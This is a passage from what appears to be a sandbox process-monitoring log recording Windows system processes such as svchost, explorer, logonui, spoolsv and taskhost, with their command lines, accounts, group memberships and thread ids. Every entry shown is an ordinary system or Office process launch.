AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b710" [0xc000000f], "LOCAL" [0x7] Thread: id = 564 os_tid = 0x27c Thread: id = 567 os_tid = 0x288 Thread: id = 568 os_tid = 0x28c Thread: id = 569 os_tid = 0x290 Thread: id = 571 os_tid = 0x294 Thread: id = 572 os_tid = 0x298 Thread: id = 573 os_tid = 0x29c Thread: id = 574 os_tid = 0x2a0 Thread: id = 653 os_tid = 0x3ec Process: id = "49" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24e3c000" os_pid = "0x2a4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b9ee" [0xc000000f], "LOCAL" [0x7] Thread: id = 575 os_tid = 0x2a8 Thread: id = 578 os_tid = 0x2b4 Thread: id = 586 os_tid = 0x2d4 Thread: id = 589 os_tid = 0x2e4 Thread: id = 590 os_tid = 0x2e8 Thread: id = 603 os_tid = 0x31c Thread: id = 604 os_tid = 0x320 Thread: id = 607 os_tid = 0x330 Thread: id = 615 os_tid = 0x350 Thread: id = 616 os_tid = 0x354 Thread: id = 624 os_tid = 0x370 Thread: id = 628 os_tid = 0x380 Thread: id = 629 os_tid = 0x384 Thread: id = 630 os_tid = 0x388 Thread: id = 633 os_tid = 0x398 Thread: id = 634 os_tid = 0x39c Thread: id = 694 os_tid = 0x14c Thread: id = 701 os_tid = 0x418 Thread: id = 706 os_tid = 0x42c Thread: id = 709 os_tid = 0x43c Thread: id = 714 os_tid = 0x450 Thread: id = 715 os_tid = 0x454 Thread: id = 792 os_tid = 0x598 Thread: id = 793 os_tid = 0x59c Process: id = "50" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x25064000" os_pid = "0x2dc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x178" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 588 os_tid = 0x2e0 Thread: id = 591 os_tid = 0x2ec Thread: id = 592 os_tid = 0x2f0 Thread: id = 593 os_tid = 0x2f4 Thread: id = 594 os_tid = 0x300 Thread: id = 595 os_tid = 0x304 Thread: id = 599 os_tid = 0x30c Thread: id = 600 os_tid = 0x310 Thread: id = 601 os_tid = 0x314 Thread: id = 602 os_tid = 0x318 Thread: id = 753 os_tid = 0x500 Process: id = "51" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x22647000" os_pid = "0x324" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ced1" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 605 os_tid = 0x328 Thread: id = 606 os_tid = 0x32c Thread: id = 608 os_tid = 0x334 Thread: id = 609 os_tid = 0x338 Thread: id = 610 os_tid = 0x33c Thread: id = 612 os_tid = 0x348 Thread: id = 614 os_tid = 0x34c Thread: id = 618 os_tid = 0x35c Thread: id = 621 os_tid = 0x364 Thread: id = 625 os_tid = 0x374 Thread: id = 639 os_tid = 0x3ac Thread: id = 641 os_tid = 0x3b4 Thread: id = 645 os_tid = 0x3c8 Thread: id = 646 os_tid = 0x3cc Thread: id = 647 os_tid = 0x3d0 Thread: id = 652 os_tid = 0x3e8 Thread: id = 661 os_tid = 0xec Thread: id = 662 os_tid = 0xfc Thread: id = 686 os_tid = 0x348 Thread: id = 687 os_tid = 0x380 Thread: id = 695 os_tid = 0x33c Thread: id = 697 os_tid = 0x150 Process: id = "52" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2184c000" os_pid = "0x340" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d0e1" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 611 os_tid = 0x344 Thread: id = 617 os_tid = 0x358 Thread: id = 620 os_tid = 0x360 Thread: id = 622 os_tid = 0x368 Thread: id = 623 os_tid = 0x36c Thread: id = 626 os_tid = 0x378 Thread: id = 640 os_tid = 0x3b0 Thread: id = 642 os_tid = 0x3b8 Thread: id = 644 os_tid = 0x3c4 Thread: id = 649 os_tid = 0x3dc Thread: id = 650 os_tid = 0x3e0 Thread: id = 668 os_tid = 0xf8 Thread: id = 669 os_tid = 0x12c Thread: id = 670 os_tid = 0x130 Thread: id = 678 os_tid = 0x1a8 Thread: id = 679 os_tid = 0x1f8 Thread: id = 721 os_tid = 0x46c Thread: id = 723 os_tid = 0x474 Thread: id = 727 os_tid = 0x410 Thread: id = 728 os_tid = 0x408 Thread: id = 732 os_tid = 0x488 Thread: id = 738 os_tid = 0x4a4 Thread: id = 742 os_tid = 0x4b0 Thread: id = 755 os_tid = 0x4ec Process: id = "53" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x21f3d000" os_pid = "0x38c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x2a4" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2ec" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b9ee" [0xc000000f], "LOCAL" [0x7] Thread: id = 631 os_tid = 0x390 Thread: id = 632 os_tid = 0x394 Thread: id = 635 os_tid = 0x3a0 Thread: id = 637 os_tid = 0x3a4 Thread: id = 638 os_tid = 0x3a8 Thread: id = 800 os_tid = 0x5b8 Process: id = "54" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x21e56000" os_pid = "0x3d4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dffc" [0xc000000f], "LOCAL" [0x7] Thread: id = 648 os_tid = 0x3d8 Thread: id = 651 os_tid = 0x3e4 Thread: id = 655 os_tid = 0x3f0 Thread: id = 656 os_tid = 0x3f8 Thread: id = 657 os_tid = 0x3fc Thread: id = 663 os_tid = 0x100 Thread: id = 667 os_tid = 0x104 Thread: id = 696 os_tid = 0x348 Thread: id = 799 os_tid = 0x5b4 Process: id = "55" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x1c347000" os_pid = "0x134" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0x230" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d0e1" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 671 os_tid = 0x128 Thread: id = 672 os_tid = 0x120 Thread: id = 673 os_tid = 0x11c Thread: id = 674 os_tid = 0x138 Thread: id = 675 os_tid = 0x164 Thread: id = 676 os_tid = 0x150 Thread: id = 677 os_tid = 0x14c Process: id = "56" image_name = "userinit.exe" filename = "c:\\windows\\system32\\userinit.exe" page_root = "0x1bd23000" os_pid = "0x1c0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\userinit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e828" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 680 os_tid = 0x1fc Process: id = "57" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x1c0b1000" os_pid = "0x1f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e828" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 681 os_tid = 0x244 Thread: id = 682 os_tid = 0x270 Thread: id = 684 os_tid = 0x2d0 Thread: id = 688 os_tid = 0x384 Thread: id = 690 os_tid = 0x3fc Thread: id = 691 os_tid = 0xf8 Thread: id = 693 os_tid = 0x3b0 Thread: id = 698 os_tid = 0x40c Thread: id = 700 os_tid = 0x414 Thread: id = 716 os_tid = 0x458 Thread: id = 724 os_tid = 0x478 Thread: id = 725 os_tid = 0x47c Thread: id = 729 os_tid = 0x480 Thread: id = 730 os_tid = 0x484 Thread: id = 731 os_tid = 0x48c Thread: id = 733 os_tid = 0x490 Thread: id = 734 os_tid = 0x494 Thread: id = 735 os_tid = 0x498 Thread: id = 736 os_tid = 0x49c Thread: id = 737 os_tid = 0x4a0 Thread: id = 739 os_tid = 0x4a8 Thread: id = 740 os_tid = 0x4ac Thread: id = 741 os_tid = 0x4b4 Thread: id = 747 os_tid = 0x4d4 Thread: id = 749 os_tid = 0x4dc Thread: id = 758 os_tid = 0x508 Thread: id = 760 os_tid = 0x510 Thread: id = 763 os_tid = 0x518 Thread: id = 765 os_tid = 0x520 Thread: id = 789 os_tid = 0x590 Process: id = "58" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x1a328000" os_pid = "0xc8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0x324" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e828" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 692 os_tid = 0x108 Thread: id = 702 os_tid = 0x41c Thread: id = 703 os_tid = 0x420 Thread: id = 704 os_tid = 0x424 Thread: id = 705 os_tid = 0x428 Process: id = "59" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1aa74000" os_pid = "0x430" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:00010c78" [0xc000000f], "LOCAL" [0x7] Thread: id = 707 os_tid = 0x434 Thread: id = 708 os_tid = 0x438 Thread: id = 710 os_tid = 0x440 Thread: id = 711 os_tid = 0x444 Thread: id = 712 os_tid = 0x448 Thread: id = 713 os_tid = 0x44c Thread: id = 717 os_tid = 0x45c Thread: id = 718 os_tid = 0x460 Thread: id = 719 os_tid = 0x464 Thread: id = 720 os_tid = 0x468 Thread: id = 722 os_tid = 0x470 Thread: id = 746 os_tid = 0x4d0 Process: id = "60" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x17e7c000" os_pid = "0x4c4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00014c17" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 744 os_tid = 0x4c8 Thread: id = 748 os_tid = 0x4d8 Thread: id = 751 os_tid = 0x4e4 Thread: id = 752 os_tid = 0x4e8 Thread: id = 759 os_tid = 0x50c Thread: id = 767 os_tid = 0x52c Process: id = "61" image_name = "bcssync.exe" filename = "c:\\program files\\microsoft office\\office14\\bcssync.exe" page_root = "0x171c0000" os_pid = "0x4f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "57" os_parent_pid = "0x1f4" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe\" /DelayServices" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e828" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 756 os_tid = 0x4f4 Process: id = "62" image_name = "runonce.exe" filename = "c:\\windows\\syswow64\\runonce.exe" page_root = "0x16afd000" os_pid = "0x4f8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "57" os_parent_pid = "0x1f4" cmd_line = "C:\\Windows\\SysWOW64\\runonce.exe /Run6432" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e828" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 757 os_tid = 0x4fc Thread: id = 784 os_tid = 0x578 Thread: id = 790 os_tid = 0x58c Thread: id = 794 os_tid = 0x5a0 Thread: id = 795 os_tid = 0x5a4 Process: id = "63" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x16d72000" os_pid = "0x524" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0x230" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e828" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 766 os_tid = 0x528 Thread: id = 768 os_tid = 0x530 Thread: id = 769 os_tid = 0x53c Thread: id = 770 os_tid = 0x540 Thread: id = 771 os_tid = 0x544 Thread: id = 772 os_tid = 0x548 Thread: id = 777 os_tid = 0x55c Process: id = "64" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x16db3000" os_pid = "0x534" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:000174b7" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 775 os_tid = 0x538 Thread: id = 778 os_tid = 0x560 Thread: id = 779 os_tid = 0x564 Thread: id = 780 os_tid = 0x568 Thread: id = 781 os_tid = 0x56c Thread: id = 786 os_tid = 0x580 Thread: id = 797 os_tid = 0x5ac Process: id = "65" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x16d77000" os_pid = "0x550" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e828" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 776 os_tid = 0x554 Thread: id = 782 os_tid = 0x570 Thread: id = 783 os_tid = 0x574 Thread: id = 785 os_tid = 0x57c Thread: id = 787 os_tid = 0x584 Thread: id = 788 os_tid = 0x588 Thread: id = 791 os_tid = 0x594 Thread: id = 796 os_tid = 0x5a8 Thread: id = 798 os_tid = 0x5b0